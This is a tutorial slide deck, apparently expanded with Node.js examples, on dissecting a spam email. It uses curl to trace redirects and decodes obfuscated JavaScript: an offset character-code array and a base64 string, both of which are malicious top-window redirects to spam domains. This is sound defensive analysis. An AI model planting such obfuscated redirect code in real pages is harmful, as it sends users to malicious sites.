Fun with cURL and spam
(don’t click it, dissect it)
First a Disclaimer…
• It isn’t my fault if, in your exploration, you intentionally or inadvertently
do something BAD to your system.
• I will try to give enough info to suggest good search terms for
independent exploration if this interests you. I am not trying to create
any sort of definitive guide or suggesting this is a best or even good
way to accomplish a task.
• You wouldn’t use a circular saw without knowing how it works. Using
shell commands and executing JavaScript from the address bar of
your browser is a lot like playing with power tools. You probably will
not lose a thumb but there is a likelihood of pain nonetheless.
Spam
Everybody gets it, some is obvious, some a little
more sneaky and occasionally an email with actual
value ends up caught in the email client’s spam net.
The screen grab is from MS Outlook, which will
show you just the text… not the HTML. NO CLICKING
LINKS!
My example has lots of signs it is garbage and
should be set to e-oblivion:
• Do you really think that is a google team addy?
• This is Not the format I give out for my email
(gmail allows mixed caps and dots, like
sT.eve.pOte so I can see who sells me out)
• Delayed email at some blog URL? C’mon. (This
is the URL I will use for an example)
• No opt out? Not even one with a malicious
addy behind it? They aren’t even trying…(an
opt out is required by US law and legit
businesses using mass mailings will always have
a means to tell them to stop)
cURL, short version and a headstart
curl -L -v -A "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML,
like Gecko) Chrome/24.0.1312.52 Safari/537.17" http://somewhere.com
The switches
-L follow redirects (the response sends you straight somewhere else. There are
legitimate uses, URL shorteners like goo.gl and bit.ly, but a redirect chain is also a
good place to hide bad things. With -L curl follows up to 50 hops by default; add
--max-redirs 5 if you want it to stop early.)
-v verbose (I always like verbose output… in this case it shows the connects,
disconnects and every redirect hop, with request lines prefixed ">" and response
lines prefixed "<". It goes to stderr, so add 2>&1 if you want to pipe it.)
-A user agent string to send (cURL pretends to be a browser by sending a browser’s
info. Some sites serve harmless filler to anything that identifies itself as curl, so the
example uses a common browser string to look like an ordinary victim and get
what the victim would get.)
A habit worth keeping: write the body to a file with -o page.html instead of letting it
scroll past, so nothing in it is interpreted by your terminal and you can grep it later.
Here we go…
• Verbose text followed by the html of what you would see in your
browser if you had clicked the link…
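Reading the redirect chain out of that verbose output, as an added example that is not part of the original slides: a Node.js script that takes curl’s verbose stream (run the command above with 2>&1 >/dev/null so only curl’s own chatter is captured, or with 2>verbose.txt) and lists every hop’s URL, status and Location header, flagging the hops that jump to a different host. The verbose text below is constructed to look like curl’s output; it uses the slide’s placeholder somewhere.com, reserved .example hostnames and TEST-NET addresses, none of which are real targets.

```javascript
// Added example (not from the original slides): parse "curl -L -v" output into a
// redirect chain instead of eyeballing it. Runs under Node.js.
// SAMPLE_VERBOSE is constructed for this example (example hostnames, TEST-NET IPs).

const SAMPLE_VERBOSE = `
*   Trying 203.0.113.10...
* Connected to somewhere.com (203.0.113.10) port 80 (#0)
> GET / HTTP/1.1
> Host: somewhere.com
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17
> Accept: */*
>
< HTTP/1.1 302 Found
< Location: http://short.example/x9
< Content-Length: 0
<
* Connection #0 to host somewhere.com left intact
* Issue another request to this URL: 'http://short.example/x9'
* Connected to short.example (203.0.113.20) port 80 (#1)
> GET /x9 HTTP/1.1
> Host: short.example
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Location: https://landing.example/blog/?ref=mail
<
* Issue another request to this URL: 'https://landing.example/blog/?ref=mail'
* Connected to landing.example (203.0.113.30) port 443 (#2)
> GET /blog/?ref=mail HTTP/1.1
> Host: landing.example
>
< HTTP/1.1 200 OK
< Content-Type: text/html
<
`;

// One hop per request curl sent: the URL it asked for, the status it got back,
// and where it was told to go next (null on the final page).
function redirectChain(verbose) {
  const hops = [];
  let cur = null;
  let scheme = 'http';
  for (const raw of verbose.split('\n')) {
    const line = raw.trimEnd();
    let m;
    if ((m = line.match(/^\* Connected to \S+ \([^)]+\) port (\d+)/))) {
      scheme = m[1] === '443' ? 'https' : 'http';   // -v never prints the scheme itself
    } else if ((m = line.match(/^> ([A-Z]+) (\S+) HTTP\/[\d.]+$/))) {
      cur = { method: m[1], path: m[2], scheme, host: null, status: null, location: null };
      hops.push(cur);
    } else if (cur && (m = line.match(/^> Host: (.+)$/i))) {
      cur.host = m[1];
    } else if (cur && (m = line.match(/^< HTTP\/[\d.]+ (\d{3})/))) {
      cur.status = parseInt(m[1], 10);
    } else if (cur && (m = line.match(/^< Location: (.+)$/i))) {
      cur.location = m[1];
    }
  }
  return hops.map((h) => ({
    url: `${h.scheme}://${h.host}${h.path}`,
    status: h.status,
    location: h.location,
  }));
}

// Hops that land on a different host are the ones a shortener-style lure relies on.
function crossHostHops(hops) {
  return hops.filter((h) => h.location && new URL(h.location).host !== new URL(h.url).host);
}

const chain = redirectChain(SAMPLE_VERBOSE);
for (const h of chain) {
  console.log(`${h.status} ${h.url}${h.location ? ' -> ' + h.location : ''}`);
}
console.log(`${crossHostHops(chain).length} cross-host redirect(s); final page: ${chain[chain.length - 1].url}`);
```

Only the ">" and "<" lines are parsed, which is the part of curl’s verbose format that has stayed stable across versions; the "* …" chatter is read just for the port so the scheme can be recovered.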
…after some gibberish
Most of what was returned was probably a “Markov string”: filler text generated by a
Markov chain, which picks each next word from the words that came before it, so the
result reads like plausible prose sentence by sentence while saying nothing. Its job is
to fool ISPs and others (like spam filters and web crawlers) into believing the target is
legit. When an email slips past your filter with total nonsense in the body it is
probably a Markov string, and very hard to catch because each email can be generated
with unique content and seeded with highly relevant individual words.
…the part we are really after
• JavaScript at the bottom… it sits at the bottom so the rest of the page (the
filler) has rendered before the script runs, and an error, or a blocker that
catches malicious scripts, does not stop the page from looking legitimate.
• Mileage may vary. This example builds a string from an array of character codes
that have each been offset by 73: the decoder subtracts 73 from every value,
feeds the results to String.fromCharCode and hands the resulting string to the
interpreter (typically via eval()). (I will break that down better later.) Base 64
encoding is another common technique I have encountered often (there are legit
business reasons to encode strings; I will show you how to check those too).
Magic Happens Here…
• I find JavaScript to be pretty Human Readable, but for this example I cheated
with Excel…
• I needed each of the numbers with 73 subtracted
• Then ran String.fromCharCode in a browser address bar (don’t do this at home,
not everything is harmless). Current browsers strip the “javascript:” prefix when
you paste into the address bar; the DevTools console (F12) runs the same line
without that trick, and node -e runs it with no browser at all.
• javascript:alert(String.fromCharCode(119,105,110,100,111,119,46,116,111,112,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,115,109,97,114,116,112,105,108,108,115,118,97,108,117,101,46,114,117,39,59));
• If you can write JavaScript you can neuter the function like this… rather than
executing the decoded command it alerts with its text. The trick is to swap
whatever consumes the decoded string (eval(), document.write(), an assignment
to location) for alert(), so you see the payload instead of running it.
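The same steps done in code, as an added example that is not part of the original slides: a Node.js script that pulls the character-code array out of a script, works out the offset (it trusts an explicit “- N” in the decoder loop when there is one, and otherwise brute-forces every offset and keeps the one that yields printable text containing redirect keywords, which covers more than the single -73 case on the slide), and decodes the payload without ever executing it. The script text it works on is constructed for this example and points at a reserved example domain, not the one in the spam.

```javascript
// Added example (not from the original slides): decode a String.fromCharCode
// payload whose codes were offset, WITHOUT executing it. Runs under Node.js.
// SAMPLE_SCRIPT is constructed for this example; the target is a reserved
// example domain, not the one from the spam on the slides.

const SAMPLE_SCRIPT = `
<script type="text/javascript">
var a=[192,178,183,173,184,192,119,189,184,185,119,181,184,172,170,189,178,184,183,119,177,187,174,175,134,112,177,189,189,185,131,120,120,174,193,170,182,185,181,174,119,178,183,191,170,181,178,173,112,132];
var s='';for(var i=0;i<a.length;i++){s+=String.fromCharCode(a[i]-73);}eval(s);
</script>`;

// The longest run of comma-separated integers in the script is the payload.
function extractCodes(script) {
  const runs = script.match(/\d+(?:\s*,\s*\d+)+/g) || [];
  if (runs.length === 0) return [];
  const longest = runs.reduce((a, b) => (b.length > a.length ? b : a));
  return longest.split(',').map((n) => parseInt(n.trim(), 10));
}

function applyShift(codes, shift) {
  return String.fromCharCode(...codes.map((c) => c - shift));
}

// Score a candidate plaintext: reward printable ASCII, punish everything else,
// and reward the tokens a redirect payload almost always contains.
function score(text) {
  let s = 0;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    s += c >= 32 && c <= 126 ? 1 : -5;
  }
  for (const kw of ['window', 'location', 'href', 'http', 'document']) {
    if (text.includes(kw)) s += 20;
  }
  return s;
}

// Prefer the explicit "a[i]-N" written in the decoder loop; otherwise try every
// offset that keeps the codes in range and keep the best-scoring one.
function findShift(script, codes) {
  const m = script.match(/fromCharCode\s*\(\s*\w+\s*\[\s*\w+\s*\]\s*-\s*(\d+)/);
  if (m) return parseInt(m[1], 10);
  let best = { shift: 0, score: -Infinity };
  const maxCode = Math.max(...codes);
  for (let shift = 0; shift <= maxCode; shift++) {
    const s = score(applyShift(codes, shift));
    if (s > best.score) best = { shift, score: s };
  }
  return best.shift;
}

// Returns the decoded text; nothing here evaluates it.
function decodeScript(script) {
  const codes = extractCodes(script);
  if (codes.length === 0) throw new Error('no character-code array found');
  const shift = findShift(script, codes);
  return { shift, plaintext: applyShift(codes, shift) };
}

const result = decodeScript(SAMPLE_SCRIPT);
console.log(`shift: ${result.shift}`);
console.log(`decoded: ${result.plaintext}`);
```

The brute-force path is what you want when the subtraction is hidden somewhere else in the page (a variable, a second function); printable-ASCII scoring alone already narrows the offset to a handful of candidates and the keyword bonus picks the right one.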
Oh, good…another scary link
• Here is the output of our example using the Chrome browser’s address bar
• This JavaScript command sets window.top.location.href, which redirects the
top-level window (frames and all) to the link inside.
• Anecdotally most of the time this is abusing google analytics by
creating false hits… opens a couple valid pages, closes and moves on.
• Every so often there is something nastier, tracking cookies (mild) or
some more virulent web-herpes.
• Drop this URL into cURL and repeat if you dare.
A last tidbit, or…
d2luZG93LnRvcC5sb2NhdGlvbi5ocmVmPSdodHRwczovL3NvbWVldmlsYmFzdGFyZC5jb20n
…for short (the same kind of top-window redirect, base 64 encoded)
• Base 64 encoding has honest upstanding uses
• JavaScript has built in functions to encode (window.btoa()) and
decode (window.atob())
• I use them to send secret messages ;-)
• They can also hide malicious intent
• Spotting it: a base 64 string uses only A-Z, a-z, 0-9, + and /, and is padded
with = to a multiple of four characters. It is encoding, not encryption, so anyone
who finds it can read it; decode before you decide whether a string is innocent.
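Checking base 64 strings the way the slide suggests, as an added example that is not part of the original slides: a Node.js script that pulls every quoted atob(...) argument out of a script, confirms it is well-formed base 64 before decoding, decodes it with Buffer (the server-side twin of window.atob) and reports whether the decoded text is a location assignment and where it points, all without executing anything. The first encoded string in the sample is the one printed on the slide; the rest of the sample script is constructed for this example.

```javascript
// Added example (not from the original slides): find, validate and decode
// atob('...') payloads without running them. Runs under Node.js.
// SAMPLE_SCRIPT is constructed; its first base64 string is the one from the slide.

const SAMPLE_SCRIPT = `
<script>
var p = atob('d2luZG93LnRvcC5sb2NhdGlvbi5ocmVmPSdodHRwczovL3NvbWVldmlsYmFzdGFyZC5jb20n');
eval(p);
var greeting = atob('aGVsbG8=');
</script>`;

// Strict shape check: base64 alphabet only, optional "=" padding, length a multiple of 4.
function looksLikeBase64(s) {
  return s.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(s);
}

// Buffer is lenient about junk input, so validate first; latin1 mirrors what atob returns.
function decodeBase64(s) {
  if (!looksLikeBase64(s)) throw new Error('not well-formed base64: ' + s);
  return Buffer.from(s, 'base64').toString('latin1');
}

// Every string literal passed directly to atob(...).
function findAtobArgs(script) {
  const re = /atob\s*\(\s*(['"])([^'"]*)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(script)) !== null) out.push(m[2]);
  return out;
}

// If the decoded text assigns a location, return the URL it assigns; else null.
function redirectTarget(code) {
  const m = code.match(
    /(?:window|top|self|document|location)[\w.]*\.(?:href|location)\s*=\s*(['"])([^'"]*)\1/
  );
  return m ? m[2] : null;
}

function analyse(script) {
  return findAtobArgs(script).map((encoded) => {
    const decoded = decodeBase64(encoded);
    return { encoded, decoded, redirectsTo: redirectTarget(decoded) };
  });
}

for (const r of analyse(SAMPLE_SCRIPT)) {
  console.log(r.decoded + (r.redirectsTo ? `   -> redirect to ${r.redirectsTo}` : ''));
}
```

The validity check matters more than it looks: spam scripts often build the base 64 string by concatenating pieces or reversing it first, so a literal that fails the shape test is itself a hint that there is a second layer of obfuscation to peel.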
Links for the curious
• cURL man page - http://curl.haxx.se/docs/manpage.html
• Opt out/Spam laws - https://www.ftc.gov/tips-advice/business-center/guidance/can-spam-act-compliance-guide-business
• Markov strings - https://en.wikipedia.org/wiki/Markov_algorithm
• atob – https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64/atob
• JavaScript from the address bar - http://www.wikihow.com/Have-Fun-With-Your-Address-Bar-on-Your-Browser
• Base 64 encoding - https://www.base64decode.org
• Me, especially if you are looking for a full stack ‘white hat’ - https://www.linkedin.com/in/steve-pote-61b02b103
